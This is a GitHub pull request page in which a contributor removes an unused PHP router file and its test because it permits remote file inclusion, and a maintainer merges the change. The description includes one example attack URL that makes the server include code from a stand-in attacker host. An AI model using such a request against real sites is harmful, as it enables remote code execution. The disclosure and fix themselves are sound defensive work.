New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remove router.php and tests/test_router.php. #141

Merged
merged 1 commit into from Nov 2, 2015

Conversation

Projects
None yet
2 participants
@ghost

ghost commented Nov 2, 2015

They are not currently used and contain dangerous code that is vulnerable
to remote code execution if the default security of php.ini is reduced to
allow file_exists and include to retrieve additional URL-style protocols.

For example, an attacker could request:
https://domain/router.php?page=http://badguy/malicious

Remove router.php and tests/test_router.php.
They are not currently used and contain dangerous code that is vulnerable
to remote code execution if the default security of php.ini is reduced to
allow file_exists and include to retrieve additional URL-style protocols.
@zackgalbreath

This comment has been minimized.

Show comment
Hide comment
@zackgalbreath

zackgalbreath Nov 2, 2015

Contributor

Thanks for bringing this to our attention. @jjomier any concerns before I merge this PR?

Contributor

zackgalbreath commented Nov 2, 2015

Thanks for bringing this to our attention. @jjomier any concerns before I merge this PR?

zackgalbreath added a commit that referenced this pull request Nov 2, 2015

Merge pull request #141 from ls--/master
Remove router.php and tests/test_router.php.

@zackgalbreath zackgalbreath merged commit 7f6cd35 into Kitware:master Nov 2, 2015

1 of 2 checks passed

ci/circleci Your tests failed
Details
StyleCI The StyleCI analysis has passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment